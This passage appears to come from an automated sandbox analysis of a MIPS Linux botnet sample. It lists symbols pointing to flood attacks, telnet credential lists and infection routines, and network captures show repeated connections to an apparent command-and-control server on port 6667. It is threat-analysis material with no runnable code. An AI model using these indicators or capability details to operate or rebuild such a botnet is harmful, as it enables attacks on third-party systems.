                                                                                                                          getgid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          gethostbyname.symtab0x4102c0116FUNC<unknown>DEFAULT3
                                                                                                                          gethostbyname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          gethostbyname_r.symtab0x4103401108FUNC<unknown>DEFAULT3
                                                                                                                          gethostbyname_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          getpagesize.symtab0x40c87048FUNC<unknown>DEFAULT3
                                                                                                                          getpagesize.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          getpid.symtab0x40c8a084FUNC<unknown>DEFAULT3
                                                                                                                          getpid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          getrlimit.symtab0x40c90084FUNC<unknown>DEFAULT3
                                                                                                                          getrlimit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          getsockname.symtab0x41080084FUNC<unknown>DEFAULT3
                                                                                                                          getsockname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          getsockopt.symtab0x410860120FUNC<unknown>DEFAULT3
                                                                                                                          getsockopt.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          getuid.symtab0x412f5084FUNC<unknown>DEFAULT3
                                                                                                                          getuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          gotIP.symtab0x4627744OBJECT<unknown>DEFAULT14
                                                                                                                          h.4832.symtab0x46898c20OBJECT<unknown>DEFAULT14
                                                                                                                          h_errno.symtab0x4689f44OBJECT<unknown>DEFAULT14
                                                                                                                          heap_alloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          heap_alloc_at.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          heap_free.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          hextable.symtab0x4180641024OBJECT<unknown>DEFAULT5
                                                                                                                          hlt.symtab0x4002fc0NOTYPE<unknown>DEFAULT3
                                                                                                                          htonl.symtab0x41015040FUNC<unknown>DEFAULT3
                                                                                                                          htons.symtab0x41017824FUNC<unknown>DEFAULT3
                                                                                                                          i.4143.symtab0x461b584OBJECT<unknown>DEFAULT11
                                                                                                                          index.symtab0x40f7f0256FUNC<unknown>DEFAULT3
                                                                                                                          inet_addr.symtab0x41027072FUNC<unknown>DEFAULT3
                                                                                                                          inet_aton.symtab0x4149d0280FUNC<unknown>DEFAULT3
                                                                                                                          inet_aton.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          inet_makeaddr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          inet_ntoa.symtab0x41024c32FUNC<unknown>DEFAULT3
                                                                                                                          inet_ntoa.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          inet_ntoa_r.symtab0x410190188FUNC<unknown>DEFAULT3
                                                                                                                          inet_ntop.symtab0x416980852FUNC<unknown>DEFAULT3
                                                                                                                          inet_ntop4.symtab0x41678c500FUNC<unknown>DEFAULT3
                                                                                                                          inet_pton.symtab0x4164d0700FUNC<unknown>DEFAULT3
                                                                                                                          inet_pton4.symtab0x4163e0240FUNC<unknown>DEFAULT3
                                                                                                                          infect.symtab0x461cbc4OBJECT<unknown>DEFAULT11
                                                                                                                          initConnection.symtab0x40aaec592FUNC<unknown>DEFAULT3
                                                                                                                          init_rand.symtab0x400310300FUNC<unknown>DEFAULT3
                                                                                                                          initfini.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          initfini.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          initial_fa.symtab0x461f70264OBJECT<unknown>DEFAULT11
                                                                                                                          initstate.symtab0x411754208FUNC<unknown>DEFAULT3
                                                                                                                          initstate_r.symtab0x411c30328FUNC<unknown>DEFAULT3
                                                                                                                          ioctl.symtab0x40c960104FUNC<unknown>DEFAULT3
                                                                                                                          ioctl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          ipState.5242.symtab0x4627884OBJECT<unknown>DEFAULT14
                                                                                                                          isatty.symtab0x41002060FUNC<unknown>DEFAULT3
                                                                                                                          isatty.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          isspace.symtab0x40ce3044FUNC<unknown>DEFAULT3
                                                                                                                          isspace.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          kill.symtab0x40c9d088FUNC<unknown>DEFAULT3
                                                                                                                          kill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          knownBots.symtab0x461b60344OBJECT<unknown>DEFAULT11
                                                                                                                          lengthd.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          lengthq.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          libc/string/mips/memcpy.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          libc/string/mips/memset.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          libc/sysdeps/linux/mips/crt1.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          libc/sysdeps/linux/mips/crti.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          libc/sysdeps/linux/mips/crtn.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          libc/sysdeps/linux/mips/pipe.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          listFork.symtab0x403450632FUNC<unknown>DEFAULT3
                                                                                                                          llseek.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          lseek64.symtab0x417630164FUNC<unknown>DEFAULT3
                                                                                                                          macAddress.symtab0x4627806OBJECT<unknown>DEFAULT14
                                                                                                                          main.symtab0x40b0f44780FUNC<unknown>DEFAULT3
                                                                                                                          mainCommSock.symtab0x4627704OBJECT<unknown>DEFAULT14
                                                                                                                          makeIPPacket.symtab0x404a74296FUNC<unknown>DEFAULT3
                                                                                                                          makeRandomStr.symtab0x40263c268FUNC<unknown>DEFAULT3
                                                                                                                          malloc.symtab0x410d40492FUNC<unknown>DEFAULT3
                                                                                                                          malloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          matchPrompt.symtab0x403900536FUNC<unknown>DEFAULT3
                                                                                                                          memchr.symtab0x414320264FUNC<unknown>DEFAULT3
                                                                                                                          memchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          memcpy.symtab0x40f5e0308FUNC<unknown>DEFAULT3
                                                                                                                          memmove.symtab0x414430816FUNC<unknown>DEFAULT3
                                                                                                                          memmove.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          mempcpy.symtab0x41476076FUNC<unknown>DEFAULT3
                                                                                                                          mempcpy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          memrchr.symtab0x4147b0272FUNC<unknown>DEFAULT3
                                                                                                                          memrchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          memset.symtab0x40f720144FUNC<unknown>DEFAULT3
                                                                                                                          mylock.symtab0x46209024OBJECT<unknown>DEFAULT11
                                                                                                                          mylock.symtab0x468a0024OBJECT<unknown>DEFAULT14
                                                                                                                          mylock.symtab0x4621c024OBJECT<unknown>DEFAULT11
                                                                                                                          nanosleep.symtab0x412fb084FUNC<unknown>DEFAULT3
                                                                                                                          nanosleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          negotiate.symtab0x4036c8568FUNC<unknown>DEFAULT3
                                                                                                                          next_start.1065.symtab0x4687a04OBJECT<unknown>DEFAULT14
                                                                                                                          ntohl.symtab0x41011040FUNC<unknown>DEFAULT3
                                                                                                                          ntohl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          ntohs.symtab0x41013824FUNC<unknown>DEFAULT3
                                                                                                                          ntop.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          numpids.symtab0x4627788OBJECT<unknown>DEFAULT14
                                                                                                                          object.2349.symtab0x46275424OBJECT<unknown>DEFAULT14
                                                                                                                          open.symtab0x40ca30124FUNC<unknown>DEFAULT3
                                                                                                                          open.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          opennameservers.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          ourIP.symtab0x4627284OBJECT<unknown>DEFAULT13
                                                                                                                          ourPublicIP.symtab0x46272c4OBJECT<unknown>DEFAULT13
                                                                                                                          p.2294.symtab0x461af00OBJECT<unknown>DEFAULT11
                                                                                                                          parseHex.symtab0x401d78176FUNC<unknown>DEFAULT3
                                                                                                                          passwords.symtab0x461d1080OBJECT<unknown>DEFAULT11
                                                                                                                          pids.symtab0x4627344OBJECT<unknown>DEFAULT13
                                                                                                                          pipe.symtab0x40c3a064FUNC<unknown>DEFAULT3
                                                                                                                          poll.symtab0x415ba084FUNC<unknown>DEFAULT3
                                                                                                                          poll.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          prctl.symtab0x40cad0120FUNC<unknown>DEFAULT3
                                                                                                                          prctl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          prefix.4045.symtab0x41fde012OBJECT<unknown>DEFAULT5
                                                                                                                          print.symtab0x400d6c1456FUNC<unknown>DEFAULT3
                                                                                                                          printchar.symtab0x4007e0184FUNC<unknown>DEFAULT3
                                                                                                                          printf.symtab0x40d0e092FUNC<unknown>DEFAULT3
                                                                                                                          printf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          printi.symtab0x400ad4664FUNC<unknown>DEFAULT3
                                                                                                                          prints.symtab0x400898572FUNC<unknown>DEFAULT3
                                                                                                                          processCmd.symtab0x408ac08236FUNC<unknown>DEFAULT3
                                                                                                                          qual_chars.4050.symtab0x41fe0020OBJECT<unknown>DEFAULT5
                                                                                                                          raise.symtab0x4175e076FUNC<unknown>DEFAULT3
                                                                                                                          raise.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          rand.symtab0x4115e028FUNC<unknown>DEFAULT3
                                                                                                                          rand.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          rand_cmwc.symtab0x40043c472FUNC<unknown>DEFAULT3
                                                                                                                          random.symtab0x411600164FUNC<unknown>DEFAULT3
                                                                                                                          random.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          random_poly_info.symtab0x420aa040OBJECT<unknown>DEFAULT5
                                                                                                                          random_r.symtab0x411a0c176FUNC<unknown>DEFAULT3
                                                                                                                          random_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          randtbl.symtab0x4620a8128OBJECT<unknown>DEFAULT11
                                                                                                                          rawmemchr.symtab0x416170200FUNC<unknown>DEFAULT3
                                                                                                                          rawmemchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          read.symtab0x40cb5084FUNC<unknown>DEFAULT3
                                                                                                                          read.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          readUntil.symtab0x403b18868FUNC<unknown>DEFAULT3
                                                                                                                          read_etc_hosts_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          read_until_response.symtab0x402b50208FUNC<unknown>DEFAULT3
                                                                                                                          read_with_timeout.symtab0x402c20360FUNC<unknown>DEFAULT3
                                                                                                                          realloc.symtab0x4110c0472FUNC<unknown>DEFAULT3
                                                                                                                          realloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          recv.symtab0x4108e084FUNC<unknown>DEFAULT3
                                                                                                                          recv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          recvLine.symtab0x402748928FUNC<unknown>DEFAULT3
                                                                                                                          reset_telstate.symtab0x402e54100FUNC<unknown>DEFAULT3
                                                                                                                          sbrk.symtab0x413010144FUNC<unknown>DEFAULT3
                                                                                                                          sbrk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          scanPid.symtab0x4627304OBJECT<unknown>DEFAULT13
                                                                                                                          sclose.symtab0x404b9c128FUNC<unknown>DEFAULT3
                                                                                                                          select.symtab0x40cbb0120FUNC<unknown>DEFAULT3
                                                                                                                          select.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          send.symtab0x41094084FUNC<unknown>DEFAULT3
                                                                                                                          send.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          sendCNC.symtab0x408888372FUNC<unknown>DEFAULT3
                                                                                                                          sendHTTP.symtab0x40811c820FUNC<unknown>DEFAULT3
                                                                                                                          sendSTD.symtab0x40687c664FUNC<unknown>DEFAULT3
                                                                                                                          sendTCP.symtab0x40751c2492FUNC<unknown>DEFAULT3
                                                                                                                          sendUDP.symtab0x406b142568FUNC<unknown>DEFAULT3
                                                                                                                          senditbudAMP.symtab0x4084501080FUNC<unknown>DEFAULT3
                                                                                                                          sendto.symtab0x4109a0128FUNC<unknown>DEFAULT3
                                                                                                                          sendto.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          setsid.symtab0x40cc3084FUNC<unknown>DEFAULT3
                                                                                                                          setsid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          setsockopt.symtab0x410a20120FUNC<unknown>DEFAULT3
                                                                                                                          setsockopt.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          setstate.symtab0x4116a4176FUNC<unknown>DEFAULT3
                                                                                                                          setstate_r.symtab0x4118d0316FUNC<unknown>DEFAULT3
                                                                                                                          sigaction.symtab0x412c80232FUNC<unknown>DEFAULT3
                                                                                                                          sigaction.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          sigaddset.symtab0x410b00104FUNC<unknown>DEFAULT3
                                                                                                                          sigaddset.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          sigempty.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          sigemptyset.symtab0x410b7060FUNC<unknown>DEFAULT3
                                                                                                                          signal.symtab0x410bb0252FUNC<unknown>DEFAULT3
                                                                                                                          signal.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          sigprocmask.symtab0x40cc90148FUNC<unknown>DEFAULT3
                                                                                                                          sigprocmask.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          sigsetops.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          sleep.symtab0x412410564FUNC<unknown>DEFAULT3
                                                                                                                          sleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          snprintf.symtab0x40d14068FUNC<unknown>DEFAULT3
                                                                                                                          snprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          socket.symtab0x410aa084FUNC<unknown>DEFAULT3
                                                                                                                          socket.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          socket_connect.symtab0x404c1c444FUNC<unknown>DEFAULT3
                                                                                                                          sockprintf.symtab0x40140c344FUNC<unknown>DEFAULT3
                                                                                                                          spec_and_mask.4049.symtab0x41fe1416OBJECT<unknown>DEFAULT5
                                                                                                                          spec_base.4044.symtab0x41fdec7OBJECT<unknown>DEFAULT5
                                                                                                                          spec_chars.4046.symtab0x41fe4021OBJECT<unknown>DEFAULT5
                                                                                                                          spec_flags.4045.symtab0x41fe588OBJECT<unknown>DEFAULT5
                                                                                                                          spec_or_mask.4048.symtab0x41fe2416OBJECT<unknown>DEFAULT5
                                                                                                                          spec_ranges.4047.symtab0x41fe349OBJECT<unknown>DEFAULT5
                                                                                                                          sprintf.symtab0x40d19080FUNC<unknown>DEFAULT3
                                                                                                                          sprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          srand.symtab0x411824172FUNC<unknown>DEFAULT3
                                                                                                                          srandom.symtab0x411824172FUNC<unknown>DEFAULT3
                                                                                                                          srandom_r.symtab0x411abc372FUNC<unknown>DEFAULT3
                                                                                                                          static_id.symtab0x4621902OBJECT<unknown>DEFAULT11
                                                                                                                          static_ns.symtab0x468a184OBJECT<unknown>DEFAULT14
                                                                                                                          stderr.symtab0x461e684OBJECT<unknown>DEFAULT11
                                                                                                                          stdin.symtab0x461e604OBJECT<unknown>DEFAULT11
                                                                                                                          stdout.symtab0x461e644OBJECT<unknown>DEFAULT11
                                                                                                                          strcasecmp.symtab0x40fef0108FUNC<unknown>DEFAULT3
                                                                                                                          strcasecmp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          strcasestr.symtab0x40ff60152FUNC<unknown>DEFAULT3
                                                                                                                          strcasestr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          strcat.symtab0x40f7b052FUNC<unknown>DEFAULT3
                                                                                                                          strcat.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          strchr.symtab0x40f7f0256FUNC<unknown>DEFAULT3
                                                                                                                          strchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          strcmp.symtab0x40f8f044FUNC<unknown>DEFAULT3
                                                                                                                          strcmp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          strcoll.symtab0x40f8f044FUNC<unknown>DEFAULT3
                                                                                                                          strcpy.symtab0x40f92036FUNC<unknown>DEFAULT3
                                                                                                                          strcpy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          strdup.symtab0x416350144FUNC<unknown>DEFAULT3
                                                                                                                          strdup.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          strerror_r.symtab0x40fd20392FUNC<unknown>DEFAULT3
                                                                                                                          strlen.symtab0x40f950184FUNC<unknown>DEFAULT3
                                                                                                                          strlen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          strncat.symtab0x416240180FUNC<unknown>DEFAULT3
                                                                                                                          strncat.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          strncpy.symtab0x40fa10188FUNC<unknown>DEFAULT3
                                                                                                                          strncpy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          strnlen.symtab0x40fad0256FUNC<unknown>DEFAULT3
                                                                                                                          strnlen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          strpbrk.symtab0x41499064FUNC<unknown>DEFAULT3
                                                                                                                          strpbrk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          strspn.symtab0x41630076FUNC<unknown>DEFAULT3
                                                                                                                          strspn.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          strstr.symtab0x40fbd0256FUNC<unknown>DEFAULT3
                                                                                                                          strstr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          strtok.symtab0x41000032FUNC<unknown>DEFAULT3
                                                                                                                          strtok.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          strtok_r.symtab0x4148c0204FUNC<unknown>DEFAULT3
                                                                                                                          strtok_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          strtol.symtab0x411fe028FUNC<unknown>DEFAULT3
                                                                                                                          strtol.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          successes.symtab0x461dc016OBJECT<unknown>DEFAULT11
                                                                                                                          system.symtab0x411d80568FUNC<unknown>DEFAULT3
                                                                                                                          system.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          szprintf.symtab0x401394120FUNC<unknown>DEFAULT3
                                                                                                                          tcgetattr.symtab0x410060176FUNC<unknown>DEFAULT3
                                                                                                                          tcgetattr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          tcpcsum.symtab0x404910356FUNC<unknown>DEFAULT3
                                                                                                                          time.symtab0x40cd3084FUNC<unknown>DEFAULT3
                                                                                                                          time.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          tmpdirs.symtab0x461d6044OBJECT<unknown>DEFAULT11
                                                                                                                          tolower.symtab0x4176e060FUNC<unknown>DEFAULT3
                                                                                                                          tolower.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          toupper.symtab0x40ce6060FUNC<unknown>DEFAULT3
                                                                                                                          toupper.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          trim.symtab0x400614460FUNC<unknown>DEFAULT3
                                                                                                                          type_codes.symtab0x41fe6024OBJECT<unknown>DEFAULT5
                                                                                                                          type_sizes.symtab0x41fe7812OBJECT<unknown>DEFAULT5
                                                                                                                          unknown.1088.symtab0x41ff1014OBJECT<unknown>DEFAULT5
                                                                                                                          unsafe_state.symtab0x46213028OBJECT<unknown>DEFAULT11
                                                                                                                          uppercase.symtab0x402158164FUNC<unknown>DEFAULT3
                                                                                                                          usernames.symtab0x461cc080OBJECT<unknown>DEFAULT11
                                                                                                                          usleep.symtab0x412650144FUNC<unknown>DEFAULT3
                                                                                                                          usleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          vfork.symtab0x40cd9028FUNC<unknown>DEFAULT3
                                                                                                                          vfork.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          vfprintf.symtab0x40d8d0260FUNC<unknown>DEFAULT3
                                                                                                                          vfprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          vsnprintf.symtab0x40d1e0260FUNC<unknown>DEFAULT3
                                                                                                                          vsnprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          wait4.symtab0x4130a088FUNC<unknown>DEFAULT3
                                                                                                                          wait4.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          waitpid.symtab0x40cdb028FUNC<unknown>DEFAULT3
                                                                                                                          waitpid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          wcrtomb.symtab0x413120112FUNC<unknown>DEFAULT3
                                                                                                                          wcrtomb.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          wcsnrtombs.symtab0x4131d0228FUNC<unknown>DEFAULT3
                                                                                                                          wcsnrtombs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          wcsrtombs.symtab0x41319064FUNC<unknown>DEFAULT3
                                                                                                                          wcsrtombs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          wildString.symtab0x401e28656FUNC<unknown>DEFAULT3
                                                                                                                          write.symtab0x40cdd084FUNC<unknown>DEFAULT3
                                                                                                                          write.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                                                          xdigits.3043.symtab0x420f1417OBJECT<unknown>DEFAULT5
                                                                                                                          zprintf.symtab0x40131c120FUNC<unknown>DEFAULT3

                                                                                                                          Download Network PCAP: filteredfull

                                                                                                                          • Total Packets: 27
                                                                                                                          • 6667 undefined
                                                                                                                          • 443 (HTTPS)
                                                                                                                          • 53 (DNS)
                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Mar 27, 2025 22:05:07.186683893 CET54636443192.168.2.1334.254.182.186
                                                                                                                          Mar 27, 2025 22:05:07.730658054 CET54636443192.168.2.1334.254.182.186
                                                                                                                          Mar 27, 2025 22:05:08.786596060 CET54636443192.168.2.1334.254.182.186
                                                                                                                          Mar 27, 2025 22:05:08.955184937 CET4435463634.254.182.186192.168.2.13
                                                                                                                          Mar 27, 2025 22:05:09.140789986 CET4435463634.254.182.186192.168.2.13
                                                                                                                          Mar 27, 2025 22:05:09.140803099 CET4435463634.254.182.186192.168.2.13
                                                                                                                          Mar 27, 2025 22:05:09.140814066 CET4435463634.254.182.186192.168.2.13
                                                                                                                          Mar 27, 2025 22:05:09.140830040 CET54636443192.168.2.1334.254.182.186
                                                                                                                          Mar 27, 2025 22:05:09.140834093 CET4435463634.254.182.186192.168.2.13
                                                                                                                          Mar 27, 2025 22:05:09.140846014 CET4435463634.254.182.186192.168.2.13
                                                                                                                          Mar 27, 2025 22:05:09.140850067 CET54636443192.168.2.1334.254.182.186
                                                                                                                          Mar 27, 2025 22:05:09.140850067 CET54636443192.168.2.1334.254.182.186
                                                                                                                          Mar 27, 2025 22:05:09.140861988 CET54636443192.168.2.1334.254.182.186
                                                                                                                          Mar 27, 2025 22:05:09.140871048 CET54636443192.168.2.1334.254.182.186
                                                                                                                          Mar 27, 2025 22:05:09.140872002 CET4435463634.254.182.186192.168.2.13
                                                                                                                          Mar 27, 2025 22:05:09.140908003 CET54636443192.168.2.1334.254.182.186
                                                                                                                          Mar 27, 2025 22:05:09.141520977 CET54636443192.168.2.1334.254.182.186
                                                                                                                          Mar 27, 2025 22:05:09.311841965 CET4435463634.254.182.186192.168.2.13
                                                                                                                          Mar 27, 2025 22:05:09.311904907 CET4435463634.254.182.186192.168.2.13
                                                                                                                          Mar 27, 2025 22:05:09.311940908 CET54636443192.168.2.1334.254.182.186
                                                                                                                          Mar 27, 2025 22:05:09.312069893 CET54636443192.168.2.1334.254.182.186
                                                                                                                          Mar 27, 2025 22:05:09.368798971 CET608866667192.168.2.1393.115.172.234
                                                                                                                          Mar 27, 2025 22:05:09.481386900 CET4435463634.254.182.186192.168.2.13
                                                                                                                          Mar 27, 2025 22:05:09.481406927 CET4435463634.254.182.186192.168.2.13
                                                                                                                          Mar 27, 2025 22:05:09.481441975 CET54636443192.168.2.1334.254.182.186
                                                                                                                          Mar 27, 2025 22:05:09.481441975 CET54636443192.168.2.1334.254.182.186
                                                                                                                          Mar 27, 2025 22:05:09.482144117 CET54636443192.168.2.1334.254.182.186
                                                                                                                          Mar 27, 2025 22:05:09.530489922 CET66676088693.115.172.234192.168.2.13
                                                                                                                          Mar 27, 2025 22:05:09.650909901 CET4435463634.254.182.186192.168.2.13
                                                                                                                          Mar 27, 2025 22:05:09.650966883 CET54636443192.168.2.1334.254.182.186
                                                                                                                          Mar 27, 2025 22:05:09.650984049 CET4435463634.254.182.186192.168.2.13
                                                                                                                          Mar 27, 2025 22:05:09.651019096 CET54636443192.168.2.1334.254.182.186
                                                                                                                          Mar 27, 2025 22:05:39.544842958 CET608886667192.168.2.1393.115.172.234
                                                                                                                          Mar 27, 2025 22:05:39.701714993 CET66676088893.115.172.234192.168.2.13
                                                                                                                          Mar 27, 2025 22:06:09.706001997 CET608906667192.168.2.1393.115.172.234
                                                                                                                          Mar 27, 2025 22:06:09.872813940 CET66676089093.115.172.234192.168.2.13
                                                                                                                          Mar 27, 2025 22:06:39.876701117 CET608926667192.168.2.1393.115.172.234
                                                                                                                          Mar 27, 2025 22:06:40.043756008 CET66676089293.115.172.234192.168.2.13
                                                                                                                          Mar 27, 2025 22:07:10.047889948 CET608946667192.168.2.1393.115.172.234
                                                                                                                          Mar 27, 2025 22:07:10.212137938 CET66676089493.115.172.234192.168.2.13
                                                                                                                          Mar 27, 2025 22:07:40.216602087 CET608966667192.168.2.1393.115.172.234
                                                                                                                          Mar 27, 2025 22:07:40.373713970 CET66676089693.115.172.234192.168.2.13
                                                                                                                          Mar 27, 2025 22:08:10.377856016 CET608986667192.168.2.1393.115.172.234
                                                                                                                          Mar 27, 2025 22:08:10.544955969 CET66676089893.115.172.234192.168.2.13
                                                                                                                          Mar 27, 2025 22:08:40.548624992 CET609006667192.168.2.1393.115.172.234
                                                                                                                          Mar 27, 2025 22:08:40.713628054 CET66676090093.115.172.234192.168.2.13
                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Mar 27, 2025 22:07:52.391927958 CET3828053192.168.2.131.1.1.1
                                                                                                                          Mar 27, 2025 22:07:52.392003059 CET3505353192.168.2.131.1.1.1
                                                                                                                          Mar 27, 2025 22:07:52.474850893 CET53350531.1.1.1192.168.2.13
                                                                                                                          Mar 27, 2025 22:07:52.474880934 CET53382801.1.1.1192.168.2.13
                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                          Mar 27, 2025 22:07:52.391927958 CET192.168.2.131.1.1.10xc773Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                                                                                                          Mar 27, 2025 22:07:52.392003059 CET192.168.2.131.1.1.10x9f66Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                          Mar 27, 2025 22:07:52.474880934 CET1.1.1.1192.168.2.130xc773No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                                                                                                          Mar 27, 2025 22:07:52.474880934 CET1.1.1.1192.168.2.130xc773No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                                                                                                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
